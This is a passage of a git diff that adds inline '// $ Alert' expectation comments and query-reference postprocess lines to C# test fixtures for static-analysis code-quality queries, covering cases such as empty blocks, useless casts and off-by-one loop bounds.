/// GOOD: Type params are correctly labeled @@ -95,7 +95,7 @@ class Class5 { } /// /// BAD typeparam /// GOOD typeparam - void method5() { } + void method5() { } // $ Alert[cs/xmldoc/missing-type-parameter] Alert[cs/xmldoc/unknown-type-parameter] // BAD: These fields are empty /// @@ -103,7 +103,7 @@ void method5() { } /// /// /// - public virtual int method4(int p1, int p2) { return p1; } + public virtual int method4(int p1, int p2) { return p1; } // $ Alert[cs/xmldoc/missing-parameter] Alert[cs/xmldoc/missing-return] Alert[cs/xmldoc/missing-summary] Alert[cs/xmldoc/missing-type-parameter] } class Class2 : Class1 @@ -132,7 +132,7 @@ public void method5() // BAD: Has only System.Runtime.CompilerServices attribute [System.Runtime.CompilerServices.My2] - public void method6() + public void method6() // $ Alert[cs/xmldoc/missing-xmldoc] { } } diff --git a/csharp/ql/test/query-tests/EmptyBlock/EmptyBlock.cs b/csharp/ql/test/query-tests/EmptyBlock/EmptyBlock.cs index b3e0cff6ae30..4095af2863a4 100644 --- a/csharp/ql/test/query-tests/EmptyBlock/EmptyBlock.cs +++ b/csharp/ql/test/query-tests/EmptyBlock/EmptyBlock.cs @@ -7,7 +7,7 @@ static void Method(string[] args) // BAD foreach (var arg in args) { - } + } // $ Alert // OK - comment foreach (var arg in args) @@ -24,7 +24,7 @@ static void Method(string[] args) // BAD if (true) { - } + } // $ Alert // OK - comment if (true) @@ -46,6 +46,6 @@ static void Method(string[] args) // BAD: there is no update for (int i = 0; i < 10;) { - } + } // $ Alert } } diff --git a/csharp/ql/test/query-tests/EmptyBlock/EmptyBlock.qlref b/csharp/ql/test/query-tests/EmptyBlock/EmptyBlock.qlref index af8a3a21f8a7..5fe264815b80 100644 --- a/csharp/ql/test/query-tests/EmptyBlock/EmptyBlock.qlref +++ b/csharp/ql/test/query-tests/EmptyBlock/EmptyBlock.qlref @@ -1 +1,2 @@ -Likely Bugs/Statements/EmptyBlock.ql +query: Likely Bugs/Statements/EmptyBlock.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Language Abuse/CatchOfGenericException/CatchOfGenericException.cs b/csharp/ql/test/query-tests/Language Abuse/CatchOfGenericException/CatchOfGenericException.cs index 64c4038d3319..45dc182cc729 100644 --- a/csharp/ql/test/query-tests/Language Abuse/CatchOfGenericException/CatchOfGenericException.cs +++ b/csharp/ql/test/query-tests/Language Abuse/CatchOfGenericException/CatchOfGenericException.cs @@ -9,14 +9,14 @@ void M(bool rethrow) } catch (Exception) { // BAD - } + } // $ Alert try { } catch { // BAD - } + } // $ Alert try { @@ -53,6 +53,6 @@ double reciprocal(double input) { // BAD // division by zero, return 0 return 0; - } + } // $ Alert } } diff --git a/csharp/ql/test/query-tests/Language Abuse/CatchOfGenericException/CatchOfGenericException.qlref b/csharp/ql/test/query-tests/Language Abuse/CatchOfGenericException/CatchOfGenericException.qlref index 9606fc128a75..c5b986a2b663 100644 --- a/csharp/ql/test/query-tests/Language Abuse/CatchOfGenericException/CatchOfGenericException.qlref +++ b/csharp/ql/test/query-tests/Language Abuse/CatchOfGenericException/CatchOfGenericException.qlref @@ -1 +1,2 @@ -Language Abuse/CatchOfGenericException.ql \ No newline at end of file +query: Language Abuse/CatchOfGenericException.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Language Abuse/ChainedIs/ChainedIs.cs b/csharp/ql/test/query-tests/Language Abuse/ChainedIs/ChainedIs.cs index ffe1da808750..06899677ffe8 100644 --- a/csharp/ql/test/query-tests/Language Abuse/ChainedIs/ChainedIs.cs +++ b/csharp/ql/test/query-tests/Language Abuse/ChainedIs/ChainedIs.cs @@ -62,7 +62,7 @@ public void M(object x) } else if (x is F) { - } // BAD + } // BAD // $ Alert } class A { } diff --git a/csharp/ql/test/query-tests/Language Abuse/ChainedIs/ChainedIs.qlref b/csharp/ql/test/query-tests/Language Abuse/ChainedIs/ChainedIs.qlref index 0d67fca32396..a46923159024 100644 --- a/csharp/ql/test/query-tests/Language Abuse/ChainedIs/ChainedIs.qlref +++ b/csharp/ql/test/query-tests/Language Abuse/ChainedIs/ChainedIs.qlref @@ -1 +1,2 @@ -Language Abuse/ChainedIs.ql +query: Language Abuse/ChainedIs.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Language Abuse/DubiousTypeTestOfThis/DubiousTypeTestOfThis.cs b/csharp/ql/test/query-tests/Language Abuse/DubiousTypeTestOfThis/DubiousTypeTestOfThis.cs index a6cad0e456e4..c8a3e85f3630 100644 --- a/csharp/ql/test/query-tests/Language Abuse/DubiousTypeTestOfThis/DubiousTypeTestOfThis.cs +++ b/csharp/ql/test/query-tests/Language Abuse/DubiousTypeTestOfThis/DubiousTypeTestOfThis.cs @@ -4,10 +4,10 @@ class BaseClass { public int add(int x) { - if (this is FiveAdder) + if (this is FiveAdder) // $ Alert return x + 5; - if (this is TenAdder) + if (this is TenAdder) // $ Alert return x + 10; return 0; diff --git a/csharp/ql/test/query-tests/Language Abuse/DubiousTypeTestOfThis/DubiousTypeTestOfThis.qlref b/csharp/ql/test/query-tests/Language Abuse/DubiousTypeTestOfThis/DubiousTypeTestOfThis.qlref index cf59e9dbd51a..c51f8fb4f465 100644 --- a/csharp/ql/test/query-tests/Language Abuse/DubiousTypeTestOfThis/DubiousTypeTestOfThis.qlref +++ b/csharp/ql/test/query-tests/Language Abuse/DubiousTypeTestOfThis/DubiousTypeTestOfThis.qlref @@ -1 +1,2 @@ -Language Abuse/DubiousTypeTestOfThis.ql \ No newline at end of file +query: Language Abuse/DubiousTypeTestOfThis.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Language Abuse/DubiousTypeTestOfThis/DubiousTypeTestOfThis2.cs b/csharp/ql/test/query-tests/Language Abuse/DubiousTypeTestOfThis/DubiousTypeTestOfThis2.cs index 0c3a8e543f7d..6fc16c4428c7 100644 --- a/csharp/ql/test/query-tests/Language Abuse/DubiousTypeTestOfThis/DubiousTypeTestOfThis2.cs +++ b/csharp/ql/test/query-tests/Language Abuse/DubiousTypeTestOfThis/DubiousTypeTestOfThis2.cs @@ -5,7 +5,7 @@ class C { void M() { - if (this is D) ; // BAD + if (this is D) ; // BAD // $ Alert Debug.Assert(this is D); // GOOD } } diff --git a/csharp/ql/test/query-tests/Language Abuse/ForeachCapture/ForeachCapture.cs b/csharp/ql/test/query-tests/Language Abuse/ForeachCapture/ForeachCapture.cs index 18fdcc9c1bc9..9af0f31392da 100644 --- a/csharp/ql/test/query-tests/Language Abuse/ForeachCapture/ForeachCapture.cs +++ b/csharp/ql/test/query-tests/Language Abuse/ForeachCapture/ForeachCapture.cs @@ -11,7 +11,7 @@ static void Main(string[] args) foreach (var arg in args) { // BAD: Storing a delegate in an event. - event1 += () => arg; + event1 += () => arg; // $ Alert // GOOD: Make a copy of the loop variable. var argCopy = arg; @@ -21,7 +21,7 @@ static void Main(string[] args) goodUseOfDelegate(() => arg); // BAD: Calling a function which stores the delegate - badUseOfDelegate(() => arg); + badUseOfDelegate(() => arg); // $ Alert // GOOD: The delegate does not escape the loop Del d = () => arg; diff --git a/csharp/ql/test/query-tests/Language Abuse/ForeachCapture/ForeachCapture.qlref b/csharp/ql/test/query-tests/Language Abuse/ForeachCapture/ForeachCapture.qlref index 733f31198af9..01f701f769f9 100644 --- a/csharp/ql/test/query-tests/Language Abuse/ForeachCapture/ForeachCapture.qlref +++ b/csharp/ql/test/query-tests/Language Abuse/ForeachCapture/ForeachCapture.qlref @@ -1 +1,2 @@ -Language Abuse/ForeachCapture.ql +query: Language Abuse/ForeachCapture.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Language Abuse/MissedTernaryOpportunity/MissedTernaryOpportunity.cs b/csharp/ql/test/query-tests/Language Abuse/MissedTernaryOpportunity/MissedTernaryOpportunity.cs index 407bde9643e4..82bdb9152162 100644 --- a/csharp/ql/test/query-tests/Language Abuse/MissedTernaryOpportunity/MissedTernaryOpportunity.cs +++ b/csharp/ql/test/query-tests/Language Abuse/MissedTernaryOpportunity/MissedTernaryOpportunity.cs @@ -6,11 +6,11 @@ public bool M() { if (true) { return false; } else { Field++; return true; } // GOOD return true ? false : true; // GOOD - if (true) return false; else { { return true; } } // BAD + if (true) return false; else { { return true; } } // BAD // $ Alert var x = ""; if (true) { Field = 0; } else { x = ""; } // GOOD if (true) { Field = 0; } else { x = ""; Field = 1; } // GOOD Field = true ? 0 : 1; // GOOD - if (true) { this.Field = 0; } else Field = 1; // BAD + if (true) { this.Field = 0; } else Field = 1; // BAD // $ Alert } } diff --git a/csharp/ql/test/query-tests/Language Abuse/MissedTernaryOpportunity/MissedTernaryOpportunity.qlref b/csharp/ql/test/query-tests/Language Abuse/MissedTernaryOpportunity/MissedTernaryOpportunity.qlref index 7efb97ac6fe4..4d45b7edd2fb 100644 --- a/csharp/ql/test/query-tests/Language Abuse/MissedTernaryOpportunity/MissedTernaryOpportunity.qlref +++ b/csharp/ql/test/query-tests/Language Abuse/MissedTernaryOpportunity/MissedTernaryOpportunity.qlref @@ -1 +1,2 @@ -Language Abuse/MissedTernaryOpportunity.ql +query: Language Abuse/MissedTernaryOpportunity.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Language Abuse/NestedIf/NestedIf.qlref b/csharp/ql/test/query-tests/Language Abuse/NestedIf/NestedIf.qlref index c3c2012be180..19cd4d8ca684 100644 --- a/csharp/ql/test/query-tests/Language Abuse/NestedIf/NestedIf.qlref +++ b/csharp/ql/test/query-tests/Language Abuse/NestedIf/NestedIf.qlref @@ -1 +1,2 @@ -Language Abuse/NestedIf.ql \ No newline at end of file +query: Language Abuse/NestedIf.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Language Abuse/NestedIf/nestedif.cs b/csharp/ql/test/query-tests/Language Abuse/NestedIf/nestedif.cs index 733325d2c597..bb59facd9c89 100644 --- a/csharp/ql/test/query-tests/Language Abuse/NestedIf/nestedif.cs +++ b/csharp/ql/test/query-tests/Language Abuse/NestedIf/nestedif.cs @@ -5,10 +5,10 @@ class NestedIf void fn() { // BAD: - if (true) if (false) return; + if (true) if (false) return; // $ Alert // BAD - if (true) if (false) if (true) return; + if (true) if (false) if (true) return; // $ Alert // BAD: using braces if (true) @@ -18,7 +18,7 @@ void fn() { } } - } + } // $ Alert // GOOD: contains else part if (true) diff --git a/csharp/ql/test/query-tests/Language Abuse/RethrowException/RethrowException.cs b/csharp/ql/test/query-tests/Language Abuse/RethrowException/RethrowException.cs index ee7cf41a0a21..46a42769944a 100644 --- a/csharp/ql/test/query-tests/Language Abuse/RethrowException/RethrowException.cs +++ b/csharp/ql/test/query-tests/Language Abuse/RethrowException/RethrowException.cs @@ -9,7 +9,7 @@ static void Main(string[] args) } catch (Exception e) { - throw e; // BAD + throw e; // BAD // $ Alert } try @@ -18,7 +18,7 @@ static void Main(string[] args) catch (Exception e) { if (true) - throw e; // BAD + throw e; // BAD // $ Alert } try diff --git a/csharp/ql/test/query-tests/Language Abuse/RethrowException/RethrowException.qlref b/csharp/ql/test/query-tests/Language Abuse/RethrowException/RethrowException.qlref index b406a8b5fccd..1f83a6b74e62 100644 --- a/csharp/ql/test/query-tests/Language Abuse/RethrowException/RethrowException.qlref +++ b/csharp/ql/test/query-tests/Language Abuse/RethrowException/RethrowException.qlref @@ -1 +1,2 @@ -Language Abuse/RethrowException.ql \ No newline at end of file +query: Language Abuse/RethrowException.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Language Abuse/SimplifyBoolExpr/SimplifyBoolExpr.cs b/csharp/ql/test/query-tests/Language Abuse/SimplifyBoolExpr/SimplifyBoolExpr.cs index 5ea4c8c15cf5..175507010a13 100644 --- a/csharp/ql/test/query-tests/Language Abuse/SimplifyBoolExpr/SimplifyBoolExpr.cs +++ b/csharp/ql/test/query-tests/Language Abuse/SimplifyBoolExpr/SimplifyBoolExpr.cs @@ -6,36 +6,36 @@ void Fn() bool b = false; int x = 0, y = 0; - if (b == true) ; - if (b == false) ; - if (true == b) ; - if (false == b) ; - if (b != true) ; - if (b != false) ; - if (true != b) ; - if (false != b) ; - if (b && true) ; - if (b && false) ; - if (true && b) ; - if (false && b) ; - if (b || true) ; - if (b || false) ; - if (true || b) ; - if (false || b) ; - if (!(x == y)) ; - if (!(x != y)) ; - if (!(x < y)) ; - if (!(x <= y)) ; - if (!(x >= y)) ; - if (!(x > y)) ; - if (b ? true : false) ; - if (b ? true : true) ; - if (b ? false : true) ; - if (b ? true : true) ; - if (b ? b : false) ; - if (b ? b : true) ; - if (b ? false : b) ; - if (b ? true : b) ; + if (b == true) ; // $ Alert + if (b == false) ; // $ Alert + if (true == b) ; // $ Alert + if (false == b) ; // $ Alert + if (b != true) ; // $ Alert + if (b != false) ; // $ Alert + if (true != b) ; // $ Alert + if (false != b) ; // $ Alert + if (b && true) ; // $ Alert + if (b && false) ; // $ Alert + if (true && b) ; // $ Alert + if (false && b) ; // $ Alert + if (b || true) ; // $ Alert + if (b || false) ; // $ Alert + if (true || b) ; // $ Alert + if (false || b) ; // $ Alert + if (!(x == y)) ; // $ Alert + if (!(x != y)) ; // $ Alert + if (!(x < y)) ; // $ Alert + if (!(x <= y)) ; // $ Alert + if (!(x >= y)) ; // $ Alert + if (!(x > y)) ; // $ Alert + if (b ? true : false) ; // $ Alert + if (b ? true : true) ; // $ Alert + if (b ? false : true) ; // $ Alert + if (b ? true : true) ; // $ Alert + if (b ? b : false) ; // $ Alert + if (b ? b : true) ; // $ Alert + if (b ? false : b) ; // $ Alert + if (b ? true : b) ; // $ Alert // BAD if (true ? b : b) ; diff --git a/csharp/ql/test/query-tests/Language Abuse/SimplifyBoolExpr/SimplifyBoolExpr.qlref b/csharp/ql/test/query-tests/Language Abuse/SimplifyBoolExpr/SimplifyBoolExpr.qlref index 27f8ee90aa90..222fc236213b 100644 --- a/csharp/ql/test/query-tests/Language Abuse/SimplifyBoolExpr/SimplifyBoolExpr.qlref +++ b/csharp/ql/test/query-tests/Language Abuse/SimplifyBoolExpr/SimplifyBoolExpr.qlref @@ -1 +1,2 @@ -Language Abuse/SimplifyBoolExpr.ql \ No newline at end of file +query: Language Abuse/SimplifyBoolExpr.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Language Abuse/SimplifyBoolExpr/SimplifyBoolExprBad.cs b/csharp/ql/test/query-tests/Language Abuse/SimplifyBoolExpr/SimplifyBoolExprBad.cs index e65c2a88fbf7..89e72c2780ab 100644 --- a/csharp/ql/test/query-tests/Language Abuse/SimplifyBoolExpr/SimplifyBoolExprBad.cs +++ b/csharp/ql/test/query-tests/Language Abuse/SimplifyBoolExpr/SimplifyBoolExprBad.cs @@ -2,7 +2,7 @@ class Bad { int Size { get; set; } - bool Espresso => !(Size > 4); - bool Latte => Espresso == false && Size <= 8; - bool Grande => Espresso == false ? Latte != true : false; + bool Espresso => !(Size > 4); // $ Alert + bool Latte => Espresso == false && Size <= 8; // $ Alert + bool Grande => Espresso == false ? Latte != true : false; // $ Alert } diff --git a/csharp/ql/test/query-tests/Language Abuse/UselessCastToSelf/UselessCastToSelf.cs b/csharp/ql/test/query-tests/Language Abuse/UselessCastToSelf/UselessCastToSelf.cs index e3aa1ad3067c..e39cd89f15c1 100644 --- a/csharp/ql/test/query-tests/Language Abuse/UselessCastToSelf/UselessCastToSelf.cs +++ b/csharp/ql/test/query-tests/Language Abuse/UselessCastToSelf/UselessCastToSelf.cs @@ -6,11 +6,11 @@ class Test void f() { // BAD - var bad1 = (int)1; - var bad2 = (Test)this; - var bad3 = this as Test; + var bad1 = (int)1; // $ Alert + var bad2 = (Test)this; // $ Alert + var bad3 = this as Test; // $ Alert func = (Func)(x => x); // MISSING - exprFunc = (Expression>)(x => x); + exprFunc = (Expression>)(x => x); // $ Alert // GOOD var good1 = (object)1; @@ -22,16 +22,16 @@ void f() var good7 = (Action)((int x) => { }); func = x => x; exprFunc = x => x; - exprFuncUntyped = (Expression>)(x => x); // FP + exprFuncUntyped = (Expression>)(x => x); // FP // $ Alert } enum Enum { A = 2, B = 1 | A, - C = 1 | (int)A, // BAD + C = 1 | (int)A, // BAD // $ Alert D = 9 | (32 << A), - E = 9 | (32 << (int)A) // BAD + E = 9 | (32 << (int)A) // BAD // $ Alert } private Func func; diff --git a/csharp/ql/test/query-tests/Language Abuse/UselessCastToSelf/UselessCastToSelf.qlref b/csharp/ql/test/query-tests/Language Abuse/UselessCastToSelf/UselessCastToSelf.qlref index 7a137fff0870..6e56b5c55af3 100644 --- a/csharp/ql/test/query-tests/Language Abuse/UselessCastToSelf/UselessCastToSelf.qlref +++ b/csharp/ql/test/query-tests/Language Abuse/UselessCastToSelf/UselessCastToSelf.qlref @@ -1 +1,2 @@ -Language Abuse/UselessCastToSelf.ql \ No newline at end of file +query: Language Abuse/UselessCastToSelf.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Language Abuse/UselessIsBeforeAs/UselessIsBeforeAs.cs b/csharp/ql/test/query-tests/Language Abuse/UselessIsBeforeAs/UselessIsBeforeAs.cs index af7d26c98f58..13893c684290 100644 --- a/csharp/ql/test/query-tests/Language Abuse/UselessIsBeforeAs/UselessIsBeforeAs.cs +++ b/csharp/ql/test/query-tests/Language Abuse/UselessIsBeforeAs/UselessIsBeforeAs.cs @@ -5,7 +5,7 @@ public object M(object x) if (x is string) { M(x as string); // GOOD - return (x as string) + " "; // BAD + return (x as string) + " "; // BAD // $ Alert } else { diff --git a/csharp/ql/test/query-tests/Language Abuse/UselessIsBeforeAs/UselessIsBeforeAs.qlref b/csharp/ql/test/query-tests/Language Abuse/UselessIsBeforeAs/UselessIsBeforeAs.qlref index 9a5a7fd703c1..3c499bb78025 100644 --- a/csharp/ql/test/query-tests/Language Abuse/UselessIsBeforeAs/UselessIsBeforeAs.qlref +++ b/csharp/ql/test/query-tests/Language Abuse/UselessIsBeforeAs/UselessIsBeforeAs.qlref @@ -1 +1,2 @@ -Language Abuse/UselessIsBeforeAs.ql +query: Language Abuse/UselessIsBeforeAs.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Language Abuse/UselessNullCoalescingExpression/UselessNullCoalescingExpression.cs b/csharp/ql/test/query-tests/Language Abuse/UselessNullCoalescingExpression/UselessNullCoalescingExpression.cs index f05782416fd5..b8dd096a0874 100644 --- a/csharp/ql/test/query-tests/Language Abuse/UselessNullCoalescingExpression/UselessNullCoalescingExpression.cs +++ b/csharp/ql/test/query-tests/Language Abuse/UselessNullCoalescingExpression/UselessNullCoalescingExpression.cs @@ -6,14 +6,14 @@ void Main(int? param) { int? a = 5, b; - a = a ?? a; // BAD - a = a ?? (b = a); // BAD - a = Prop ?? Prop; // BAD - a = param ?? param; // BAD - a = a ?? use(a); // BAD - a = Field ?? this.Field; // BAD - a ??= a; // BAD - a ??= b = a; // BAD + a = a ?? a; // BAD // $ Alert + a = a ?? (b = a); // BAD // $ Alert + a = Prop ?? Prop; // BAD // $ Alert + a = param ?? param; // BAD // $ Alert + a = a ?? use(a); // BAD // $ Alert + a = Field ?? this.Field; // BAD // $ Alert + a ??= a; // BAD // $ Alert + a ??= b = a; // BAD // $ Alert a = a ?? cache(ref a); // GOOD a = a ?? store(out a); // GOOD diff --git a/csharp/ql/test/query-tests/Language Abuse/UselessNullCoalescingExpression/UselessNullCoalescingExpression.qlref b/csharp/ql/test/query-tests/Language Abuse/UselessNullCoalescingExpression/UselessNullCoalescingExpression.qlref index 1eb957001c9e..1145cc6ae816 100644 --- a/csharp/ql/test/query-tests/Language Abuse/UselessNullCoalescingExpression/UselessNullCoalescingExpression.qlref +++ b/csharp/ql/test/query-tests/Language Abuse/UselessNullCoalescingExpression/UselessNullCoalescingExpression.qlref @@ -1 +1,2 @@ -Language Abuse/UselessNullCoalescingExpression.ql \ No newline at end of file +query: Language Abuse/UselessNullCoalescingExpression.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Language Abuse/UselessUpcast/UselessUpcast.cs b/csharp/ql/test/query-tests/Language Abuse/UselessUpcast/UselessUpcast.cs index 0ec950e836d3..dc9f4c184ad7 100644 --- a/csharp/ql/test/query-tests/Language Abuse/UselessUpcast/UselessUpcast.cs +++ b/csharp/ql/test/query-tests/Language Abuse/UselessUpcast/UselessUpcast.cs @@ -49,13 +49,13 @@ void Test1(string[] args) B b = new B(); object o; - o = (A)b; // BAD + o = (A)b; // BAD // $ Alert o = (B)b; // GOOD: Not an upcast b.M((A)b); // GOOD: Disambiguating method call - a.M1((A)b); // BAD + a.M1((A)b); // BAD // $ Alert a.M2((A)b); // GOOD: Disambiguating method call o = true ? (A)a : b; // GOOD: Needed for ternary @@ -64,7 +64,7 @@ void Test1(string[] args) Fn((A)b); // GOOD: Disambiguating method call - Fn2((A)b); // BAD + Fn2((A)b); // BAD // $ Alert ((I2)a).Foo(); // GOOD: Cast to an interface @@ -80,7 +80,7 @@ void Test1(string[] args) StaticMethods.M1((A)b); // GOOD: disambiguate targets from `StaticMethods` void M2(A _) { } - M2((A)b); // BAD: local functions cannot be overloaded + M2((A)b); // BAD: local functions cannot be overloaded // $ Alert } static void M2(A _) { } @@ -89,7 +89,7 @@ void Test2(B b) { // BAD: even though `StaticMethods` has an `M2`, only overloads in // `Tests` are taken into account - M2((A)b); + M2((A)b); // $ Alert } class Nested @@ -100,7 +100,7 @@ static void Test(C c) { // BAD: even though `StaticMethods` and `Tests` have `M2`s, only // overloads in `Nested` are taken into account - M2((B)c); + M2((B)c); // $ Alert } } } @@ -155,11 +155,11 @@ public Sub(Sub s) : base((I1)s) { } // GOOD class SubSub : Sub { - SubSub(SubSub ss) : base((Sub)ss) { } // BAD + SubSub(SubSub ss) : base((Sub)ss) { } // BAD // $ Alert void M(SubSub ss) { - new Sub((Sub)ss); // BAD + new Sub((Sub)ss); // BAD // $ Alert } } diff --git a/csharp/ql/test/query-tests/Language Abuse/UselessUpcast/UselessUpcast.qlref b/csharp/ql/test/query-tests/Language Abuse/UselessUpcast/UselessUpcast.qlref index f0a49b78b14b..d48a3f989428 100644 --- a/csharp/ql/test/query-tests/Language Abuse/UselessUpcast/UselessUpcast.qlref +++ b/csharp/ql/test/query-tests/Language Abuse/UselessUpcast/UselessUpcast.qlref @@ -1 +1,2 @@ -Language Abuse/UselessUpcast.ql \ No newline at end of file +query: Language Abuse/UselessUpcast.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Language Abuse/UselessUpcast/UselessUpcastBad.cs b/csharp/ql/test/query-tests/Language Abuse/UselessUpcast/UselessUpcastBad.cs index c69db3104fb1..f3c20dc5d574 100644 --- a/csharp/ql/test/query-tests/Language Abuse/UselessUpcast/UselessUpcastBad.cs +++ b/csharp/ql/test/query-tests/Language Abuse/UselessUpcast/UselessUpcastBad.cs @@ -6,6 +6,6 @@ class Sub : Super {} void M() { var sub = new Sub(); - Super super = (Super)sub; + Super super = (Super)sub; // $ Alert } } diff --git a/csharp/ql/test/query-tests/Likely Bugs/BadCheckOdd/BadCheckOdd.cs b/csharp/ql/test/query-tests/Likely Bugs/BadCheckOdd/BadCheckOdd.cs index c5e87a4ed1e6..5bdfc4d6b512 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/BadCheckOdd/BadCheckOdd.cs +++ b/csharp/ql/test/query-tests/Likely Bugs/BadCheckOdd/BadCheckOdd.cs @@ -14,13 +14,13 @@ static void Main(string[] args) int a = 2; // BAD - if (a % 2 == 1) + if (a % 2 == 1) // $ Alert Console.Out.WriteLine("a is odd"); - if (a % 2 != 1) + if (a % 2 != 1) // $ Alert Console.Out.WriteLine("a is even"); - if (a % 2 > 0) + if (a % 2 > 0) // $ Alert Console.Out.WriteLine("a is odd"); - if ((a % 2) > 0) + if ((a % 2) > 0) // $ Alert Console.Out.WriteLine("a is odd"); // GOOD diff --git a/csharp/ql/test/query-tests/Likely Bugs/BadCheckOdd/BadCheckOdd.qlref b/csharp/ql/test/query-tests/Likely Bugs/BadCheckOdd/BadCheckOdd.qlref index 759b3f4ab230..b65ba073c357 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/BadCheckOdd/BadCheckOdd.qlref +++ b/csharp/ql/test/query-tests/Likely Bugs/BadCheckOdd/BadCheckOdd.qlref @@ -1 +1,2 @@ -Likely Bugs/BadCheckOdd.ql \ No newline at end of file +query: Likely Bugs/BadCheckOdd.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Likely Bugs/Collections/ContainerLengthCmpOffByOne/ContainerLengthCmpOffByOne.cs b/csharp/ql/test/query-tests/Likely Bugs/Collections/ContainerLengthCmpOffByOne/ContainerLengthCmpOffByOne.cs index d68bbfc274ec..a3266b494e8d 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/Collections/ContainerLengthCmpOffByOne/ContainerLengthCmpOffByOne.cs +++ b/csharp/ql/test/query-tests/Likely Bugs/Collections/ContainerLengthCmpOffByOne/ContainerLengthCmpOffByOne.cs @@ -5,13 +5,13 @@ class Test void Test1(string[] args) { // BAD: Loop upper bound is off-by-one - for (int i = 0; i <= args.Length; i++) + for (int i = 0; i <= args.Length; i++) // $ Alert { Console.WriteLine(args[i]); } // BAD: Loop upper bound is off-by-one - for (int i = 0; args.Length >= i; i++) + for (int i = 0; args.Length >= i; i++) // $ Alert { Console.WriteLine(args[i]); } @@ -24,13 +24,13 @@ void Test1(string[] args) int j = 0; // BAD: Off-by-one on index validity check - if (j <= args.Length) + if (j <= args.Length) // $ Alert { Console.WriteLine(args[j]); } // BAD: Off-by-one on index validity check - if (args.Length >= j) + if (args.Length >= j) // $ Alert { Console.WriteLine(args[j]); } diff --git a/csharp/ql/test/query-tests/Likely Bugs/Collections/ContainerLengthCmpOffByOne/ContainerLengthCmpOffByOne.qlref b/csharp/ql/test/query-tests/Likely Bugs/Collections/ContainerLengthCmpOffByOne/ContainerLengthCmpOffByOne.qlref index 637dac3c9b85..ce56c59063f7 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/Collections/ContainerLengthCmpOffByOne/ContainerLengthCmpOffByOne.qlref +++ b/csharp/ql/test/query-tests/Likely Bugs/Collections/ContainerLengthCmpOffByOne/ContainerLengthCmpOffByOne.qlref @@ -1 +1,2 @@ -Likely Bugs/Collections/ContainerLengthCmpOffByOne.ql \ No newline at end of file +query: Likely Bugs/Collections/ContainerLengthCmpOffByOne.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Likely Bugs/Collections/ContainerSizeCmpZero/ContainerSizeCmpZero.cs b/csharp/ql/test/query-tests/Likely Bugs/Collections/ContainerSizeCmpZero/ContainerSizeCmpZero.cs index 1fb70bd8dff2..0713bb1bac92 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/Collections/ContainerSizeCmpZero/ContainerSizeCmpZero.cs +++ b/csharp/ql/test/query-tests/Likely Bugs/Collections/ContainerSizeCmpZero/ContainerSizeCmpZero.cs @@ -29,16 +29,16 @@ static void Main(string[] args) // Arrays // NOT OK: always true - b = args.Length >= 0; + b = args.Length >= 0; // $ Alert // NOT OK: always true - b = 0 <= args.Length; + b = 0 <= args.Length; // $ Alert // NOT OK: always false - b = args.Length < 0; + b = args.Length < 0; // $ Alert // NOT OK: always false - b = 0 > args.Length; + b = 0 > args.Length; // $ Alert // OK: sometimes could be false b = args.Length > 0; @@ -58,12 +58,12 @@ static void Main(string[] args) var ys = new Stack(); // NOT OK - b = xs.Count >= 0; - b = 0 <= xs.Count; - b = 0 <= ys.Count; + b = xs.Count >= 0; // $ Alert + b = 0 <= xs.Count; // $ Alert + b = 0 <= ys.Count; // $ Alert - b = xs.Count < 0; - b = 0 > ys.Count; + b = xs.Count < 0; // $ Alert + b = 0 > ys.Count; // $ Alert // OK b = xs.Count >= -1; @@ -74,15 +74,15 @@ static void Main(string[] args) ///////// // missed in java, but not here - b = xs.Count >= (short)0; - b = xs.Count >= (byte)0; + b = xs.Count >= (short)0; // $ Alert + b = xs.Count >= (byte)0; // $ Alert ///////// // missed cases // NOT OK - b = xs.Count >= 0 + 0; - b = xs.Count >= 0 - 0; + b = xs.Count >= 0 + 0; // $ Alert + b = xs.Count >= 0 - 0; // $ Alert b = args.LongLength >= 0L; @@ -91,24 +91,24 @@ static void Main(string[] args) var zs = new MyList>(); // NOT OK - b = zs.Count >= 0; - b = zs.Count < 0; + b = zs.Count >= 0; // $ Alert + b = zs.Count < 0; // $ Alert // NOT OK - b = zs[0].Count >= 0; + b = zs[0].Count >= 0; // $ Alert // NOT OK - b = zs[0][0].Length >= 0; + b = zs[0][0].Length >= 0; // $ Alert ///////// // Dictionaries var ws = new Dictionary(); // NOT OK: Always true - b = ws.Count >= 0; + b = ws.Count >= 0; // $ Alert // NOT OK: Always true - b = 0 <= ws.Count; + b = 0 <= ws.Count; // $ Alert // OK: can be false b = ws.Count >= -1; @@ -123,12 +123,12 @@ static void Main(string[] args) var vs = new System.Collections.BitArray(1); // NOT OK: Always true - b = us.Count >= 0; - b = 0 > vs.Count; + b = us.Count >= 0; // $ Alert + b = 0 > vs.Count; // $ Alert // NOT OK: Always true - b = 0 <= us.Count; - b = vs.Count < 0; + b = 0 <= us.Count; // $ Alert + b = vs.Count < 0; // $ Alert // OK: can be false b = us.Count >= -1; @@ -144,13 +144,13 @@ static bool ReadOnlyCollection(IReadOnlyCollection xs, 